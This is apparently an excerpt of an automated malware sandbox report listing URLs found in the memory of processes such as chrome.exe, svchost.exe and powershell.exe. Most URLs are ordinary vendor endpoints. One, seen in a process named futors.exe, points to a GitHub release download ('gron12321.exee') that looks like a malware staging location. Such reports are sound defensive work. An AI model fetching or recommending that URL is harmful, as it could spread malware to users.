Source: 68qi5p.27.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: powershell.exe, 00000008.00000002.984922811.000001552BD36000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.984922811.000001552BD36000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.984922811.000001552BD36000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: chrome.exe, 0000002D.00000002.1777650410.00005B0400F57000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/gws/cdt1
Source: chrome.exe, 0000002D.00000002.1777650410.00005B0400F57000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/gws/cdt1rj
Source: chrome.exe, 0000002D.00000002.1763300284.00005B040054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
Source: svchost.exe, 0000000F.00000003.1368943282.0000021485058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.1369690877.0000021485059000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
Source: svchost.exe, 0000000F.00000002.1369777595.0000021485063000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1369040945.0000021485041000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1368943282.0000021485058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1368831638.0000021485062000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1368694459.000002148506E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1369004805.000002148505A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.1369625543.0000021485042000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.1369857708.0000021485070000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000F.00000003.1368694459.000002148506E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.1369857708.0000021485070000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000F.00000003.1368943282.0000021485058000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000F.00000002.1369813385.0000021485068000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1368811053.0000021485067000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000F.00000003.1368640120.0000021485075000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.1369879088.0000021485077000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 0000000F.00000003.1368943282.0000021485058000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000F.00000002.1369777595.0000021485063000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1368943282.0000021485058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1368831638.0000021485062000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1369004805.000002148505A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.1369572980.000002148502B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000F.00000003.1368943282.0000021485058000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 0000000F.00000002.1369813385.0000021485068000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.1369572980.000002148502B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1368811053.0000021485067000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000F.00000003.1368943282.0000021485058000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000F.00000003.1368943282.0000021485058000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000F.00000003.1368943282.0000021485058000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000F.00000002.1369777595.0000021485063000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1368831638.0000021485062000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000F.00000003.1369040945.0000021485041000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.1369625543.0000021485042000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 0000000F.00000003.1368943282.0000021485058000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000F.00000002.1369777595.0000021485063000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1368831638.0000021485062000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: chrome.exe, 0000002D.00000002.1764299921.00005B0400864000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/
Source: chrome.exe, 0000002D.00000002.1793807072.00005B0401428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717783680.00005B0401428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1843799682.00005B0401568000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/
Source: chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1763053242.00005B04004E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1773955833.00005B0400B18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1777183033.00005B0400E94000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/:
Source: chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1763053242.00005B04004E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1779428372.00005B040116C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1773955833.00005B0400B18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1843799682.00005B0401568000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1763053242.00005B04004E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1773955833.00005B0400B18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1777183033.00005B0400E94000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/J
Source: chrome.exe, 0000002D.00000003.1651077521.00005B0000514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview2K
Source: chrome.exe, 0000002D.00000002.1846887338.00005B0401988000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1763053242.00005B04004E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1773955833.00005B0400B18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1844256638.00005B0401578000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1779009107.00005B04010F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1777183033.00005B0400E94000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: chrome.exe, 0000002D.00000002.1844256638.00005B0401578000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default7
Source: chrome.exe, 0000002D.00000002.1846887338.00005B0401988000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultult
Source: chrome.exe, 0000002D.00000002.1775881875.00005B0400C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1846341231.00005B04018D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1690364771.00005B04018D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1776679945.00005B0400DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000002D.00000002.1775881875.00005B0400C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1846341231.00005B04018D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1690364771.00005B04018D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1776679945.00005B0400DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000002D.00000002.1772672941.00005B0400A64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1843799682.00005B0401568000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/
Source: chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1763053242.00005B04004E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1773955833.00005B0400B18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/:
Source: chrome.exe, 0000002D.00000002.1764009183.00005B040075C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1792443333.00005B0401370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1763053242.00005B04004E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1773955833.00005B0400B18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1778607856.00005B0401040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1779009107.00005B04010F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: chrome.exe, 0000002D.00000002.1778607856.00005B0401040000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp$
Source: chrome.exe, 0000002D.00000002.1792443333.00005B0401370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1778607856.00005B0401040000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webappHandler
Source: chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1763053242.00005B04004E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1773955833.00005B0400B18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/J
Source: chrome.exe, 0000002D.00000002.1846887338.00005B0401988000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1763053242.00005B04004E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1773955833.00005B0400B18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1846341231.00005B04018D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1789787283.00005B040121C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: chrome.exe, 0000002D.00000002.1846341231.00005B04018D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default0A
Source: chrome.exe, 0000002D.00000002.1775881875.00005B0400C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1846341231.00005B04018D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1690364771.00005B04018D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1776679945.00005B0400DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000002D.00000002.1793807072.00005B0401428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1778715418.00005B0401084000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717783680.00005B0401428000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/
Source: chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/:
Source: chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1792443333.00005B0401370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1763959544.00005B04006EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1789787283.00005B040121C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1779009107.00005B04010F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: chrome.exe, 0000002D.00000002.1792443333.00005B0401370000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp$
Source: chrome.exe, 0000002D.00000002.1763959544.00005B04006EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webappHandler
Source: chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/J
Source: chrome.exe, 0000002D.00000002.1844256638.00005B0401578000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1763959544.00005B04006EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: chrome.exe, 0000002D.00000002.1775881875.00005B0400C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1846341231.00005B04018D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1690364771.00005B04018D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1776679945.00005B0400DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000002D.00000002.1764299921.00005B0400864000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: chrome.exe, 0000002D.00000002.1764299921.00005B0400864000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: chrome.exe, 0000002D.00000002.1764299921.00005B0400864000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: chrome.exe, 0000002D.00000002.1764299921.00005B0400864000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-preprod.corp.google.com/
Source: chrome.exe, 0000002D.00000002.1764299921.00005B0400864000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-staging.corp.google.com/
Source: chrome.exe, 0000002D.00000002.1772672941.00005B0400A64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1778715418.00005B0401084000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1764299921.00005B0400864000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/:
Source: chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1793807072.00005B0401428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1778715418.00005B0401084000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717783680.00005B0401428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1761475143.00005B040005C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/?lfhs=2
Source: chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/J
Source: chrome.exe, 0000002D.00000002.1789787283.00005B040121C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1777532396.00005B0400F0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: chrome.exe, 0000002D.00000002.1792443333.00005B0401370000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_defaulter7
Source: svchost.exe, 0000000F.00000003.1368616075.0000021485034000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000F.00000002.1369625543.0000021485042000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000F.00000002.1369777595.0000021485063000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1368831638.0000021485062000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000F.00000003.1369040945.0000021485041000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1368896974.000002148505E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.1369625543.0000021485042000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000F.00000002.1369690877.0000021485059000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.t
Source: svchost.exe, 0000000F.00000003.1368943282.0000021485058000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 0000000F.00000003.1368616075.0000021485034000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/
Source: svchost.exe, 0000000F.00000002.1369813385.0000021485068000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.1369572980.000002148502B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1368811053.0000021485067000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: chrome.exe, 0000002D.00000003.1690575124.00005B0401804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1690364771.00005B0401858000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1690150500.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fonts.google.com/icons?selected=Material
Source: svchost.exe, 0000000E.00000003.1203134436.0000024B72033000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
Source: svchost.exe, 0000000E.00000003.1203134436.0000024B72000000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
Source: chrome.exe, 0000002D.00000002.1777350807.00005B0400EF3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gemini.google.com/app?q=
Source: chrome.exe, 0000002D.00000003.1651077521.00005B0000514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gemini.google.com/glic/intro?20
Source: chrome.exe, 0000002D.00000003.1651077521.00005B0000514000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gemini.google.com/glic2
Source: chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gemini.google.com/glicbN
Source: powershell.exe, 00000008.00000002.938454172.000001551BDAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: futors.exe, 0000002B.00000003.1697859830.0000000000866000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/legendary99999/dsfadsfafd/releases/download/dfgvsfdvbafd/gron12321.exee
Source: powershell.exe, 00000005.00000002.906544930.00000000054E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.938454172.000001551C7AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: chrome.exe, 0000002D.00000003.1651621191.00005B00005E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 0000002D.00000003.1651621191.00005B00005E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com//c
Source: chrome.exe, 0000002D.00000003.1651077521.00005B0000514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 0000002D.00000003.1651621191.00005B00005E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 0000002D.00000003.1651077521.00005B0000514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 0000002D.00000003.1651621191.00005B00005E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 0000002D.00000003.1651621191.00005B00005E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
Source: chrome.exe, 0000002D.00000003.1651621191.00005B00005E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Pre
Source: chrome.exe, 0000002D.00000003.1651621191.00005B00005E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
Source: chrome.exe, 0000002D.00000002.1761365220.00005B0400004000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/
Source: chrome.exe, 0000002D.00000002.1772558182.00005B0400A28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://googleusercontent.com/
Source: chrome.exe, 0000002D.00000003.1651077521.00005B0000514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718054356.00005B0401DC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://goto.google.com/sme-bugs2e
Source: 68qi5p.27.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: chrome.exe, 0000002D.00000002.1777183033.00005B0400EB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1846561770.00005B040193C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1776282589.00005B0400CF4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
Source: chrome.exe, 0000002D.00000002.1763406635.00005B0400580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717142339.00005B0401A8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717328921.00005B04016F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search?source=ntp
Source: chrome.exe, 0000002D.00000003.1716539122.00005B0400684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1716667387.00005B0401114000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/gen204
Source: chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: chrome.exe, 0000002D.00000002.1773955833.00005B0400B18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1793807072.00005B0401428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1777604042.00005B0400F28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717783680.00005B0401428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1843799682.00005B0401568000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/chat/
Source: chrome.exe, 0000002D.00000002.1773955833.00005B0400B18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/chat/:
Source: chrome.exe, 0000002D.00000002.1773955833.00005B0400B18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/chat/J
Source: chrome.exe, 0000002D.00000002.1846887338.00005B0401988000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1773955833.00005B0400B18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1844256638.00005B0401578000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1763959544.00005B04006EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/chat/download?usp=chrome_default
Source: chrome.exe, 0000002D.00000002.1844256638.00005B0401578000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/chat/download?usp=chrome_default_defaultult
Source: chrome.exe, 0000002D.00000002.1844256638.00005B0401578000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/chat/download?usp=chrome_defaultu
Source: chrome.exe, 0000002D.00000002.1772711956.00005B0400A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1843799682.00005B0401568000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/
